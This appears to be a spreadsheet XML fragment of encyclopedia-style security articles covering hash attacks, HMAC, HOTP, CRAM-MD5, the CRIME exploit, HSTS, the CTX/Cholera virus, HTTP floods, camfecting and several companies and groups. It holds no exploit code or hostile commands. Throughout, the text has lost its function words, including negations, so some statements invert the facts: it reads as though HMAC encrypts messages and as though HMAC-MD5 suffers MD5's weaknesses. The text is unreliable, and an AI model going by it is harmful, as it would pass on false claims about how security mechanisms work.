    <t>this article summarizes publicly known attacks cryptographic hash functions. note entries date. summary hash function parameters, comparison cryptographic hash functions. table color common hash functions collision resistance chosen prefix collision attack preimage resistance length extension vulnerable: md5, sha1, sha256, sha512 vulnerable: sha384, sha-3, blake2 less-common hash functions collision resistance preimage resistance attacks hashed passwords hashes described designed fast computation roughly similar speeds. because users typically choose short passwords formed predictable ways, passwords often recovered hashed value fast hash used. searches order billion tests second possible high-end graphics processors. special hashes called derivation functions created slow brute force searches. these include pbkdf2, bcrypt, scrypt, argon2, balloon. also comparison cryptographic hash functions cryptographic hash function collision attack preimage attack length extension attack cipher security summary references external links 2010 summary attacks tiger, sha-2: jian guo; ling; christian rechberger; huaxiong wang (2010-12-06). advanced meet-in-the-middle preimage attacks: first results full tiger, improved results sha-2. asiacrypt 2010.</t>
  </si>
  <si>
    <t>Hash list</t>
  </si>
  <si>
    <t>computer science, hash list typically list hashes data blocks file files. lists hashes used many different purposes, fast table lookup (hash tables) distributed databases (distributed hash tables). hash list extension concept hashing item (for instance, file). hash list subtree merkle tree. root hash often, additional hash hash list hash, also called root hash master hash) used. before downloading file network, cases hash acquired trusted source, instance friend site known good recommendations files download. when hash available, hash list received non-trusted source, like peer network. then received hash list checked trusted hash, hash list damaged fake, another hash list another source tried program finds matches hash. systems (for example, bittorrent), instead hash whole hash list available site small file. such "torrent file" contains description, file names, hash list additional data. applications hash lists used protect kind data stored, handled transferred computers. important hash lists make sure data blocks received peers peer-to-peer network received undamaged unaltered, check peers "lie" send fake blocks. usually cryptographic hash function sha-256 used hashing. hash list needs protect unintentional damage unsecured checksums crcs used. hash lists better simple hash entire file since, case data block damaged, noticed, damaged block needs redownloaded. with hash file, many undamaged blocks would redownloaded, file reconstructed tested correct hash entire file obtained. hash lists also protect nodes sabotage sending fake blocks, since case damaged block acquired source. protocols using hash lists rsync zsync bittorrent also hash tree hash table hash chain ed2k: scheme, uses hash hash list uniquely identify file cryptographic hash function list</t>
  </si>
  <si>
    <t>HashKeeper</t>
  </si>
  <si>
    <t>hashkeeper database application value primarily conducting forensic examinations computers somewhat regular basis. overview hashkeeper uses file signature algorithm establish unique numeric identifiers (hash values) files "known good" "known bad." hashkeeper application developed reduce amount time required examine files digital media. once examiner defines file known good, examiner need repeat analysis. hashkeeper compares hash values known good files hash values files computer system. where values match "known good" files, examiner say, substantial certainty, corresponding files computer system previously identified known good therefore need examined. where values match known files, examiner substantial certainty corresponding files system examined files therefore require scrutiny. hash match known files relieve examiner responsibility verifying file files are, fact, criminal nature. history created national drug intelligence center (ndic)—a component united states department justice—in 1996, first large scale source hash values "known good" "known bad" files. hashkeeper was, still community effort based upon belief members state, national, international enforcement agencies trusted submit properly categorized hash values. first community sources "known good" hash values united states internal revenue service. first source "known bad" hash values luxembourg police contributed hash values recognized child pornography. availability hashkeeper available, free-of-charge, enforcement, military government agencies throughout world. available public sending freedom information request ndic. 2012 united states budget, ndic de-funded closed doors june 2012. availability future hashkeeper uncertain. sources hashkeeper overview, national drug intelligence center. also national software reference library rainbow table references http://www.justice.gov/archive/ndic/ndic-moved.html http://www.nsrl.nist.gov/nsrl-faqs.html#faq12</t>
  </si>
  <si>
    <t>CTX (computer virus)</t>
  </si>
  <si>
    <t>computer virus created spain 1999. initially discovered part cholera worm, author intentionally infected ctx. although cholera worm capability send email, worm quickly surpassed prevalence. cholera considered obsolete, remains field, albeit rare discoveries. march 2006, news false positive mcafee virusscan program caused detections range innocuous files. simbiosis project "biocoding" virus originated part "simbiosis (sic) project". simbiosis project early attempt virus writers group combine windows file infectors windows mass-mailing worms. this 'project' attempt successful previously rare synthesis malware threats was. cholera/ctx documented virus involved simbiosis project. although gain spread wild, remarkably related file infection functions cholera mass-mailing function. also member "biocoded" string viruses. "biocoded" string seemed little beyond named biological viruses. other members group include marburg, dengue, hps, latter reference hantavirus pulmonary syndrome. "biocoded" viruses listed wildlist, including ctx. despite threatening names, biocoded viruses payload beyond graphics and, cases, deleting antivirus programs. function cholera worm today's standards, cholera fairly unremarkable mass-mailing worm, written c++. however, cholera remarkable creation smtp server. unlike worms day, relied installations microsoft outlook similar email programs, cholera capable sending mails internal mechanisms. cholera sends emails attachment setup.exe, 49,187 bytes size. emails collected files infected computer's hard drive. cholera spreads another internet-using application open, avoid detection time dial-up modems standard. when setup.exe executed, cholera displays fake error, "cannot open file: appear valid archive. downloaded file, downloading file again." cholera also network worm, inserting windows folders computers available network neighborhood. finally, cholera either win.ini (windows similar flavours) registry (windows similar flavours). infection routine upon execution, whether infected file cholera dropper, check payload routine activate (see payload). not, infect files. polymorphic nature, neither particularly simple complex nature. also obscures entry point files avoid detection. virus avoids infecting five files given folder avoid detection. files infecting padded multiple bytes avoid re-infections. payload non-destructive payload rarely activates. file executed exactly months hour infection, video requirements sufficient, infinite loop inverting desktop colours. prevalence wildlist, organization tracking computer viruses, included list threats found field november 2001 2005. mcafee false positive march 2006, mcafee, makers virusscan, announced false positive caused virus detected number common, innocent files, including microsoft excel. mcafee posted list affected files site [1]. external links mcafee false positive information symantec cholera f-secure cholera (simbiosis) newsfactor mcafee update kills more than viruses computer virus research defense computer virus their detection</t>
  </si>
  <si>
    <t>CTERA Networks</t>
  </si>
  <si>
    <t>ctera networks privately held enterprise software company headquartered york israel. company regional offices italy, france, spain, germany, australia. 2021, company designated leading vendor distributed cloud file storage gigaom.ctera partnered companies including amazon services, hewlett packard enterprise, ibm, cisco. clients include deutsche telekom, banco santander, united states department defense. october 2016 became ctera reseller. ibm's cloud object storage, integrated ctera enterprise file services platform, deployed on-premises, cloud hybrid on-premises/cloud setup. history ctera founded 2008 liran eshel zohar kaufman.as 2018, ctera raised $100 million funding investors including benchmark capital, venrock, cisco systems, bessemer venture partners vintage investment partners. gartner named ctera five cool venders storage technologies 2013 included deloitte fast list technology 2015.in june 2016, ctera earned contract provide private cloud file sharing solution united states department defense. part agreement, ctera disa (defense information systems agency) co-developed mutual authentication technology using government-issued smart cards additional layers protection beyond standard enterprise integration microsoft active directory servers.in 2021, gigaom evaluated distributed cloud file storage suppliers designated ctera leading vendor outperformer. products 2009, ctera released first cloud storage gateway, c200. gateway combined speed local network storage off-site cloud storage backup technology. 2010, ctera released c400 cloud storage gateway added features office server backup recovery collaboration capability multiple users working files stored cloud gateway. 2011, c800 gateway released local storage. 2016, ctera announced virtual cloud storage gateway deployed vmware servers enabled customers existing hardware. ctera released updates cloud storage gateway portfolio april 2016 focused efficiency storage capacity. ctera released enterprise file sync share (efss) 2012, enabled users access, share collaborate files location storing files either locally cloud. also 2012, ctera launched mobile made possible access files backups android devices.in december 2015, ctera announced cloud server data protection, storage-as-a-service server data protection software enterprise cloudops. cloud server data protection protects server data private virtual private cloud using backup agents windows linux environments object storage services cloud platforms amazon services, microsoft azure, cloud openstack-based clouds. also science technology israel hybrid cloud storage cloud storage file sharing file synchronization references</t>
  </si>
  <si>
    <t>CRIME</t>
  </si>
  <si>
    <t>crime (compression ratio info-leak made easy) security vulnerability https spdy protocols utilize compression, leak content secret cookies. when used recover content secret authentication cookies, allows attacker perform session hijacking authenticated session, allowing launching attacks. crime assigned cve-2012-4929. details vulnerability exploited combination chosen plaintext attack inadvertent information leakage data compression similar described 2002 cryptographer john kelsey. relies attacker able observe size ciphertext sent browser time inducing browser make multiple carefully crafted connections target site. attacker observes change size compressed request payload, contains secret cookie sent browser target site, variable content created attacker, variable content altered. when size compressed content reduced, inferred probable part injected content matches part source, includes secret content attacker desires discover. divide conquer techniques used home true secret content relatively small number probe attempts small multiple number secret bytes recovered.the crime exploit hypothesized adam langley, first demonstrated security researchers juliano rizzo thai duong, also created beast exploit. exploit revealed full 2012 ekoparty security conference. rizzo duong presented crime general attack works effectively large number protocols, including limited spdy (which always compresses request headers), (which compress records) http (which compress responses). prevention crime defeated preventing compression, either client end, browser disabling compression spdy requests, website preventing data compression transactions using protocol negotiation features protocol. detailed transport layer security (tls) protocol version 1.2, client sends list compression algorithms clienthello message, server picks sends back serverhello message. server choose compression method client offered, client offers 'none' compression), data compressed. similarly, since compression' must allowed clients, server always refuse compression. mitigation september 2012, crime exploit spdy tls-level compression described mitigated then-latest versions chrome firefox browsers. some websites applied countermeasures end. nginx web-server vulnerable crime since 1.0.9/1.1.6 (october/november 2011) using openssl 1.0.0+, since 1.2.2/1.3.2 (june july 2012) using versions openssl.note december 2013 crime exploit http compression mitigated all. rizzo duong warned vulnerability might even widespread spdy compression combined. breach august 2013 black conference, researchers gluck, harris prado announced variant crime exploit http compression called breach (short browser reconnaissance exfiltration adaptive compression hypertext). uncovers https secrets attacking inbuilt http data compression used webservers reduce network traffic. references</t>
  </si>
  <si>
    <t>CRAM-MD5</t>
  </si>
  <si>
    <t>cryptography, cram-md5 challenge–response authentication mechanism (cram) based hmac-md5 algorithm. mechanisms supported simple authentication security layer (sasl), often used email software part smtp authentication authentication imap users, well applications implementing ldap, xmpp, beep, protocols. when software requires authentication unencrypted connections, cram-md5 preferred mechanisms transmit passwords clear," login plain. however, can't prevent derivation password brute-force attack, less effective alternative mechanisms avoid passwords connections encrypted transport layer security (tls). protocol cram-md5 protocol involves single challenge response cycle, initiated server: challenge: server sends base64-encoded string client. before encoding, could random string, standard currently defines cram-md5 says format message-id email header value (including angle brackets) includes arbitrary string random digits, timestamp, server's fully qualified domain name. response: client responds string created follows. challenge base64-decoded. decoded challenge hashed using hmac-md5, shared secret (typically, user's password, hash thereof) secret key. hashed challenge converted string lowercase digits. username space character prepended digits. concatenation base64-encoded sent server comparison: server uses method compute expected response. given response expected response match, authentication successful. strengths one-way hash fresh random challenge provide three types security: others cannot duplicate hash without knowing password. this provides authentication. others cannot replay hash—it dependent unpredictable challenge. this variously called freshness replay prevention. observers learn password; called secrecy. weaknesses mutual authentication: client verify server. however, sasl authentication usually done connection, verifies server's identity. weak password storage: implementations require access users' plain text passwords, others (e.g. dovecot) intermediate step hmac process store md5-hash password (strictly speaking hmac's internal variables i_key_pad o_key_pad). such implementations leverage computing md5(something_with_64_bytes something_else), md5_internal(something_with_64_bytes) something_else needed know (because merkle–damgård usage md5; md5_internal without final block). i_key_pad o_key_pad start inner outer hash hmac, length bytes, fact used. threat reversibility: offline dictionary attack recover password feasible capturing successful cram-md5 protocol exchange (e.g., using cain abel). this threat unavoidable password hashing scheme, modern algorithms stretching increasing cost attack factor thousand more. conversely, cram-md5 digests calculated using computational resources dedicated hardware, even standard cpus. proxy-ability: unlike password-authenticated agreement (pake) scheme, cram-md5 establish secret shared endpoints unknown eavesdropper. active middle therefore open connection server, challenge, offer challenge client, receive client's response, forward response server. drop client's messages impersonating client server. standards cram-md5 defined ietf standards-track document 2195, supersedes 2095, earlier 1997. these facto standards define cram-md5 authentication method email mailbox-management protocols imap. cram-md5 authentication methods supported simple authentication security layer (sasl), defined 2006 4422, supersedes 1997 standard 2222. internet assigned numbers authority (iana) maintains registry sasl mechanisms, including cram-md5, limited use. cram-md5 required on-demand mail relay (odmr), defined 2645. obsolete recommend deprecate standard november 2008. alternative recommends e.g. scram sasl plain protected instead. also simple mail transfer protocol (smtp) john klensin references</t>
  </si>
  <si>
    <t>Hafnium (group)</t>
  </si>
  <si>
    <t>hafnium (sometimes styled hafnium) cyber espionage group, sometimes known advanced persistent threat, alleged ties chinese government. hafnium closely connected apt40. 2021 microsoft exchange server data breach microsoft named hafnium group responsible 2021 microsoft exchange server data breach, alleged "state-sponsored operating china". according microsoft, based china primarily united states-based virtual private servers, targeted "infectious disease researchers, firms, higher education institutions, defense contractors, policy think tanks ngos".in july 2021, foreign secretary dominic raab said attack performed "chinese state-backed groups" linked ministry state security (mss). chinese government denied responsibility 2021 microsoft breach.the name "hafnium" assigned group microsoft, publicly disclosed group's activity march 2021. microsoft described group "highly skilled sophisticated". hafnium closely connected apt40. 2022 tarrask malware hafnium linked creation tarrask, defense evasion malware used previous attacks. malware used telecommunications, internet service providers, data service companies august 2021 february 2022. malware uses scheduled task abuse hide payloads delivered servers. capabilities march 2021, reported group access china chopper shell, used 2021 microsoft exchange server data breach control hacked servers. also cyberwarfare china apollo references</t>
  </si>
  <si>
    <t>COPS (software)</t>
  </si>
  <si>
    <t>computer oracle password system (cops) first vulnerability scanner unix operating systems achieve widespread use. created farmer student purdue university. gene spafford helped farmer start project 1989. features cops software suite comprising least small vulnerability scanners, programmed audit part operating system: file permissions, including device permissions/nodes password strength content, format, security password group files (e.g., passwd) programs files /etc/rc* cron(tab) files root-suid files: which users modify them? shell scripts? cyclic redundancy check important files writability users' home directories startup files anonymous configuration unrestricted tftp, decode alias sendmail, suid uudecode problems, hidden shells inside inetd.conf, rexd inetd.conf various root checks: current directory search path? plus sign ("+") /etc/host.equiv file? mounts unrestricted? root /etc/ftpusers? compare modification dates crucial files dates advisories cert coordination center kuang expert systemafter cops, farmer developed another vulnerability scanner called satan (security administrator tool analyzing networks). cops generally considered obsolete, uncommon find systems insecure manner cops identify. references external links cops citeseer entry cops usenix paper</t>
  </si>
  <si>
    <t>Hackweiser</t>
  </si>
  <si>
    <t>hackweiser underground hacking group hacking magazine founded 1999. early-2001 founder leader, p4ntera, left group saying little. april 2001 hackweiser claimed credit start project china. project focus hack attacks based mainland chinese computer systems.the group appeared news defaced well known websites, including websites owned microsoft, sony, walmart, girlscouts america, jenny craig, dare, nellis force base area cybernanny. countless others. they noted attorney's bulletin reference "responsible hackers". they multiple categories "state hack awards"the members groups grey black hackers. members included; r4ncid, bighawk, [p]hoenix, immortal, rafa, squirrlman, odin, x[beast]x, phiz, jak-away (aka hackah jak), psaux, bi0cide, xor, xar, [s]pider, vicious, dislexik, p4ntera, prod1gy, pr0phet, scurvy, blackdog. group eventually fell apart disbanded arrest hackah mid-2003. although reports still indicate many ex-members active underground. references</t>
  </si>
  <si>
    <t>Hacktivismo Enhanced-Source Software License Agreement</t>
  </si>
  <si>
    <t>hacktivismo enhanced-source software license agreement (hessla) software license proposed hacktivismo attempts ethical restrictions modification software released license written oxblood ruffin hacktivismo cult dead cow) eric grimm, attorney eff. hessla allows enhancements made derivative works created, prohibits modification software violate human rights introduce features user. intended legally enforceable document. however, restrictions, technically free software license open source license, though inspired free software open source licenses. criticism hessla criticized free software foundation introducing restrictions claim ineffective preventing abuse, introduce legal incompatibility licenses. also listed good example human rights license creative commons wiki. derivatives browser browser temporarily based torrify ethical software license agreement (tesla) built upon hessla. also working hour system 996.icu github campaign douglas crockford "good, evil" references external links hessla tesla human rights license entry creative commons wiki</t>
  </si>
  <si>
    <t>HMAC-based one-time password</t>
  </si>
  <si>
    <t>hmac-based one-time password (hotp) one-time password (otp) algorithm based hmac. cornerstone initiative open authentication (oath). hotp published informational ietf 4226 december 2005, documenting algorithm along java implementation. since then, algorithm adopted many companies worldwide (see below). hotp algorithm freely available open standard. algorithm hotp algorithm provides method authentication symmetric generation human-readable passwords, values, used authentication attempt. one-time property leads directly single counter value. parties intending hotp must establish parameters; typically specified authenticator, either accepted authenticated: cryptographic hash method (default sha-1) secret arbitrary byte string must remain private counter counts number iterations hotp value length (6–10, default recommended)both parties compute hotp value derived secret counter then authenticator checks locally generated value value supplied authenticated. authenticator authenticated increment counter independently other, latter increase ahead former, thus resynchronisation protocol wise. 4226 actually require such, make recommendation. this simply authenticator repeatedly verification ahead counter window size authenticator's counter continues forward value verification succeeds requires actions authenticated. recommendation made persistent throttling hotp value verification take place, address relatively small size thus vulnerability brute-force attacks. suggested verification locked small number failed attempts failed attempt attracts additional (linearly increasing) delay. 6-digit codes commonly provided proprietary hardware tokens number vendors informing default value truncation extracts bits {\textstyle \log _{10}(2^{31})} decimal digits, meaning 10th digit adding less variation, taking values (i.e., digits). after verification, authenticator authenticate simply generating next hotp value, returning authenticated generate hotp value verify note counters guaranteed synchronised point process. hotp value human-readable design output, d-digit decimal number (without omission leading 0s): hotp value hotp(k, 10d.that value least significant base-10 digits hotp. hotp truncation hmac counter (under hash function hotp(k, truncate(hmach(k, c)),where counter must used big-endian. truncation first takes least significant bits uses byte offset truncate(mac) extract31(mac, mac[(19 4:(19 7]),where used extract bits starting number including ending number, numbers 0-origin. "19" formula relates size output hash function. with default sha-1, output bytes, last byte byte (0-origin). that index used select bits mac, starting extract31(mac, mac[i 1].31 bits single short 4-byte word. thus value placed inside word without using sign (the significant bit). this done definitely avoid modular arithmetic negative numbers, many differing definitions implementations. tokens both hardware software tokens available various vendors, references below. hardware tokens implementing oath hotp tend significantly cheaper competitors based proprietary algorithms. 2010, oath hotp hardware tokens purchased marginal price. some products used strong passwords well oath hotp.software tokens available (nearly) major mobile/smartphone platforms (j2me, android, iphone, blackberry, maemo, macos, windows mobile). reception although reception computer press negative 2004 2005, ietf adopted hotp 4226 december 2005, various vendors started produce hotp-compatible tokens and/or whole authentication solutions. according article "road map: replacing passwords authentication" strong authentication, published burton group division gartner, inc.) 2010, "gartner's expectation hardware form factor continue enjoy modest growth smartphone otps grow become default hardware platform time." also initiative open authentication s/key time-based one-time password algorithm (totp) references external links 4226: hotp: hmac-based one-time password algorithm 6238: totp: time-based one-time password algorithm 6287: ocra: oath challenge-response algorithm initiative open authentication implementation 4226 hopt algorithm step step python implementation jupyter notebook</t>
  </si>
  <si>
    <t>HMAC</t>
  </si>
  <si>
    <t>cryptography, hmac (sometimes expanded either keyed-hash message authentication code hash-based message authentication code) specific type message authentication code (mac) involving cryptographic hash function secret cryptographic key. mac, used simultaneously verify data integrity authenticity message. hmac provide authentication using shared secret instead using digital signatures asymmetric cryptography. trades need complex public infrastructure delegating exchange communicating parties, responsible establishing using trusted channel agree prior communication. details cryptographic hash function, sha-2 sha-3, used calculation hmac; resulting algorithm termed hmac-x, hash function used (e.g. hmac-sha256 hmac-sha3-512). cryptographic strength hmac depends upon cryptographic strength underlying hash function, size hash output, size quality key. hmac uses passes hash computation. before either pass, secret used derive keys inner outer. next, first pass hash algorithm produces internal hash derived message inner key. second pass produces final hmac code derived inner hash result outer key. thus algorithm provides better immunity length extension attacks. iterative hash function breaks message blocks fixed size iterates compression function. example, sha-256 operates 512-bit blocks. size output hmac underlying hash function (e.g., bits case sha-256 sha3-512, respectively), although truncated desired. hmac encrypt message. instead, message (encrypted not) must sent alongside hmac hash. parties secret hash message themselves, authentic, received computed hashes match. definition analysis hmac construction first published 1996 paper mihir bellare, canetti, hugo krawczyk, also wrote 2104 1997. 1996 paper also defined nested variant called nmac. fips generalizes standardizes hmacs. hmac used within ipsec, protocols json tokens. definition this definition taken 2104: hmac larger block size otherwise {\displaystyle {\begin{aligned}\operatorname {hmac} (k,m)&amp;=\operatorname {\bigl (}{\bigl (}k'\oplus opad{\bigr )}\parallel \operatorname {\bigl (}\left(k'\oplus ipad\right)\parallel m{\bigr )}{\bigr )}\\k'&amp;={\begin{cases}\operatorname \left(k\right)&amp;k{\text{ larger block size}}\\k&amp;{\text{otherwise}}\end{cases}}\end{aligned}}} cryptographic hash function message authenticated secret block-sized derived secret key, either padding right block size, hashing less equal block size first padding right zeros denotes concatenation denotes bitwise exclusive (xor) opad block-sized outer padding, consisting repeated bytes valued 0x5c ipad block-sized inner padding, consisting repeated bytes valued 0x36 implementation following pseudocode demonstrates hmac implemented. block size bits bytes) using following hash functions: sha-1, md5, ripemd-128. function hmac input: key: bytes array bytes message: bytes array bytes hashed hash: function hash function (e.g. sha-1) blocksize: integer block size hash function (e.g. bytes sha-1) outputsize: integer output size hash function (e.g. bytes sha-1) compute block sized block_sized_key computeblocksizedkey(key, hash, blocksize) o_key_pad block_sized_key [0x5c blocksize] outer padded i_key_pad block_sized_key [0x36 blocksize] inner padded return hash(o_key_pad hash(i_key_pad message)) function computeblocksizedkey input: key: bytes array bytes hash: function hash function (e.g. sha-1) blocksize: integer block size hash function (e.g. bytes sha-1) keys longer blocksize shortened hashing (length(key) blocksize) hash(key) keys shorter blocksize padded blocksize padding zeros right (length(key) blocksize) return pad(key, blocksize) zeros make blocksize bytes long return design principles design hmac specification motivated existence attacks trivial mechanisms combining hash function. example, might assume security hmac provides could achieved h(key message). however, method suffers serious flaw: hash functions, easy append data message without knowing obtain another valid ("length-extension attack"). alternative, appending using h(message key), suffers problem attacker find collision (unkeyed) hash function collision messages yielding hash provide start condition hash function appended hashed, hence final hash same). using h(key message key) better, various security papers suggested vulnerabilities approach, even different keys used.no known extension attacks found current hmac specification defined h(key h(key message)) outer application hash function masks intermediate result internal hash. values ipad opad critical security algorithm, defined large hamming distance inner outer keys fewer bits common. security reduction hmac require different least bit.the keccak hash function, selected nist sha-3 competition winner, need nested approach used generate simply prepending message, susceptible length-extension attacks. security cryptographic strength hmac depends upon size secret used. common attack hmacs brute force uncover secret key. hmacs substantially less affected collisions underlying hashing algorithms alone. particular, mihir bellare proved hmac sole assumption compression function prf. therefore, hmac-md5 suffer weaknesses found md5. 2104 requires "keys longer bytes first hashed using leads confusing pseudo-collision: longer hash block size (e.g. bytes sha-1), hmac(k, computed hmac(h(k), m).this property sometimes raised possible weakness hmac password-hashing scenarios: demonstrated possible find long ascii string random value whose hash also ascii string, values produce hmac output.in 2006, jongsung kim, alex biryukov, bart preneel, seokhie hong showed distinguish hmac reduced versions sha-1 full versions haval, md4, sha-0 random function hmac random function. differential distinguishers allow attacker devise forgery attack hmac. furthermore, differential rectangle distinguishers lead second-preimage attacks. hmac full version forged knowledge. these attacks contradict security proof hmac, provide insight hmac based existing cryptographic hash functions.in 2009, xiaoyun wang presented distinguishing attack hmac-md5 without using related keys. distinguish instantiation hmac instantiation random function queries probability 0.87.in 2011 informational 6151 published summarize security considerations hmac-md5. hmac-md5 summarizes although security hash function severely compromised currently known "attacks hmac-md5 seem indicate practical vulnerability used message authentication code", also adds "for protocol design, ciphersuite hmac-md5 included". 2011, 6234 published detailing abstract theory source code sha-based hmacs. examples here hmac values, assuming 8-bit ascii utf-8 encoding: hmac_md5("key", "the quick brown jumps lazy dog") 80070713463e7749b90c2dc24911e275 hmac_sha1("key", "the quick brown jumps lazy dog") de7c9b85b8b78aa6bc8a7a36f70a90701c9db4d9 hmac_sha256("key", "the quick brown jumps lazy dog") f7bc83f430538424b13298e6aa6fb143ef4d59a14946175997479dbc2d1a3cd8 hmac_sha256("the quick brown jumps lazy dogthe quick brown jumps lazy dog", "message") 5597b93a2843078cbb0c920ae41dfe20f1685e10c67e423c11ab91adfc319d12 references notes external links rfc2104 online hmac generator tester tool fips 198-1, keyed-hash message authentication code (hmac) hmac implementation python hmac implementation java implementation rust hmac implementation</t>
  </si>
  <si>
    <t>HTTP Flood</t>
  </si>
  <si>
    <t>http flood type distributed denial service (ddos) attack attacker manipulates http post unwanted requests order attack server application. these attacks often interconnected computers taken malware trojan horses. instead using malformed packets, spoofing reflection techniques, http floods require less bandwidth attack targeted sites servers. attack description http flood, http clients browser interact application server send http requests. request either “get” “post”. attack compel server allocate many resources possible serving attack, thus denying legitimate users access server's resources. flood request used retrieve static content like images. typically induces relatively load server request. post flood post requests likely require server perform kind processing, looking items database. therefore, http post flood attacks typically impose higher load server request. methods mitigation http flood attacks standard requests hence quite challenging differentiate valid traffic. effective mitigation methods combination traffic profiling methods mainly includes identification reputation, tracking abnormal actions employing progressive sanctuary challenges. references</t>
  </si>
  <si>
    <t>HTTP POST flood</t>
  </si>
  <si>
    <t>http post flood simply post flood) denial service attack uses post requests, part hypertext transfer protocol (http). kind http flood attack. history late 2013, post floods increasingly launched mobile devices. also http flood references</t>
  </si>
  <si>
    <t>Canaan Creative</t>
  </si>
  <si>
    <t>canaan creative, also known canaan, computer hardware manufacturer headquartered china. established 2013 nangeng “n.g.” zhang, canaan specializes blockchain servers asic microprocessor solutions bitcoin mining. history 2013, studying doctor's degree, n.g. zhang established canaan creative, served chairman ceo.in 2016, canaan attempted reverse takeover $466 millions shandong luyitong, public company listed shenzhen stock exchange.in january 2019, reports surfaced canaan considering united states. canaan raised million november 2019 ipo.in 2019, canaan listed nasdaq. references external links official website</t>
  </si>
  <si>
    <t>Camfecting</t>
  </si>
  <si>
    <t>camfecting, field computer security, process attempting hack person's webcam activate without webcam owner's permission. remotely activated webcam used watch anything within webcam's field vision, sometimes including webcam owner themselves. camfecting often carried infecting victim's computer virus provide hacker access webcam. this attack specifically targeted victim's webcam, hence name camfecting, portmanteau words camera infecting. typically, webcam hacker camfecter sends victim innocent-looking application hidden trojan software camfecter control victim's webcam. camfecter virus installs silently victim runs original application. once installed, camfecter turn webcam capture pictures/videos. camfecter software works like original webcam software present victim computer, difference camfecter controls software instead webcam's owner. notable cases marcus thomas, former assistant director fbi's operational technology division quantico, said 2013 story washington post able covertly activate computer's camera—without triggering light lets users know recording—for several years.in november 2013, american teenager jared james abrahams pleaded guilty hacking 100-150 women installing highly invasive malware blackshades computers order obtain nude images videos them. victims miss teen 2013 cassidy wolf.researchers johns hopkins university shown covertly capture images isight camera macbook imac models released 2008, reprogramming microcontroller's firmware. risk sources computer up-to-date webcam software anti-virus firewall) software installed operational increased risk camfecting. softcams nominally increase risk, maintained configured properly. preventive software recently webcam privacy software introduced companies stop being watched webcamlock. software exposes access webcam, prompts user allow deny access showing program trying access webcam. allowing user accept trusted program user recognizes, terminate attempt immediately. there market manufacture sale sliding lens covers allow users physically block computer's camera and, cases, microphone. also espionage internet privacy optic nerve (gchq) secret photography surveillance trojan webcam references external links hacking virus alert virus writer arrested spain webcam hacker's control data privacy camfecting info blog</t>
  </si>
  <si>
    <t>HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>http strict transport security (hsts) policy mechanism helps protect websites man-in-the-middle attacks protocol downgrade attacks cookie hijacking. allows servers declare browsers complying user agents) automatically interact using https connections, provide transport layer security (tls/ssl), unlike insecure http used alone. hsts ietf standards track protocol specified 6797. hsts policy communicated server user agent http response header field named "strict-transport-security". hsts policy specifies period time user agent access server secure fashion. websites using hsts often accept clear text http, either rejecting connections http systematically redirecting users https (though required specification). consequence user-agent capable able connect site. protection applies user visited site least once, relying principle trust first use. protection works user entering selecting site specifies http, automatically upgrade https, without making http request, prevents http man-in-the-middle attack occurring. specification history hsts specification published 6797 november 2012 approved october 2012 iesg publication proposed standard rfc. authors originally submitted internet draft june 2010. with conversion internet draft, specification name altered "strict transport security" (sts) "http strict transport security", specification applies http. http response header field defined hsts specification however remains named "strict-transport-security". last so-called "community version" then-named "sts" specification published december 2009, revisions based community feedback.the original draft specification jeff hodges paypal, collin jackson, adam barth published september 2009.the hsts specification based original work jackson barth described paper "forcehttps: protecting high-security sites network attacks".additionally, hsts realization facet overall vision improving security, forward jeff hodges andy steingruebl 2010 paper need coherent security policy framework(s). hsts mechanism overview server implements hsts policy supplying header https connection (hsts headers http ignored). example, server could send header future requests domain next year (max-age specified seconds; 31,536,000 equal non-leap year) https: strict-transport-security: max-age=31536000. when application issues hsts policy user agents, conformant user agents behave follows (rfc 6797): automatically turn insecure links referencing application secure links (e.g. http://example.com/some/page/ modified https://example.com/some/page/ accessing server). security connection cannot ensured (e.g. server's certificate trusted), user agent must terminate connection (rfc 6797 section 8.4, errors secure transport establishment) allow user access application (section 12.1, user recourse).the hsts policy helps protect application users passive (eavesdropping) active network attacks. man-in-the-middle attacker greatly reduced ability intercept requests responses user application server user's browser hsts policy effect application. applicability important security vulnerability hsts ssl-stripping man-in-the-middle attacks, first publicly introduced moxie marlinspike 2009 blackhat federal talk "new tricks defeating practice". (and tls) stripping attack works transparently converting secure https connection plain http connection. user connection insecure, crucially knowing whether connection secure. time marlinspike's talk, many websites tls/ssl, therefore knowing (without prior knowledge) whether plain http attack, simply website implemented tls/ssl. additionally, warnings presented user downgrade process, making attack fairly subtle vigilant. marlinspike's sslstrip tool fully automates attack.hsts addresses problem informing browser connections site always tls/ssl. hsts header stripped attacker user's first visit. google chrome, mozilla firefox, internet explorer microsoft edge attempt limit problem including "pre-loaded" list hsts sites. unfortunately solution cannot scale include websites internet. limitations, below. hsts also help prevent one's cookie-based website login credentials stolen widely available tools firesheep.because hsts time limited, sensitive attacks involving shifting victim's computer time e.g. using false packets. limitations initial request remains unprotected active attacks uses insecure protocol plain http initial request obtained insecure channel. applies first request activity period specified advertised hsts policy max-age (sites period several days months depending user activity behavior). google chrome, mozilla firefox internet explorer/microsoft edge address limitation implementing "hsts preloaded list", list contains known sites supporting hsts. this list distributed browser uses https initial request listed sites well. previously mentioned, pre-loaded lists cannot scale cover entire web. potential solution might achieved using records declare hsts policy, accessing securely dnssec, optionally certificate fingerprints ensure validity (which requires running validating resolver avoid last mile issues).junade noted hsts ineffective phony domains; using dns-based attacks, possible man-in-the-middle interceptor serve traffic artificial domain hsts preload list, made possible spoofing attacks, simply domain name misleadingly resembles real domain name www.example.org instead www.example.com. even "hsts preloaded list", hsts can't prevent advanced attacks itself, beast crime attacks introduced juliano rizzo thai duong. attacks orthogonal hsts policy enforcement. neither protect attacks server someone compromises happily serve content tls. 6797 discussion overall hsts security considerations. privacy issues hsts used near-indelibly visiting browsers recoverable identifying data (supercookies) persist browser "incognito" privacy modes. creating page makes multiple http requests selected domains, example, twenty browser requests twenty different domains used, theoretically million visitors distinguished (220) resulting requests arriving http https; latter previously recorded binary "bits" established earlier hsts headers. browser support chromium google chrome since version 4.0.211.0 firefox since version firefox mozilla integrates list websites supporting hsts. opera since version safari since mavericks (version 10.9, late 2013) internet explorer windows windows kb3058515 installed (released windows update june 2015) microsoft edge internet explorer windows blackberry browser webview since blackberry 10.3.3. deployment best practices depending actual deployment certain threats (e.g. cookie injection attacks) avoided following best practices. hsts hosts declare hsts policy top-level domain name. example, hsts host https://sub.example.com also answer hsts header https://example.com. header specify includesubdomains directive. addition hsts deployment, host https://www.example.com include request resource https://example.com make sure hsts parent domain protects user potential cookie injection attacks performed mitm would inject reference parent domain even http://nonexistentpeer.example.com), attacker would answer. also content security policy .dev google-operated included hsts preload-list default http public pinning references external links 6797 http strict transport security (hsts) 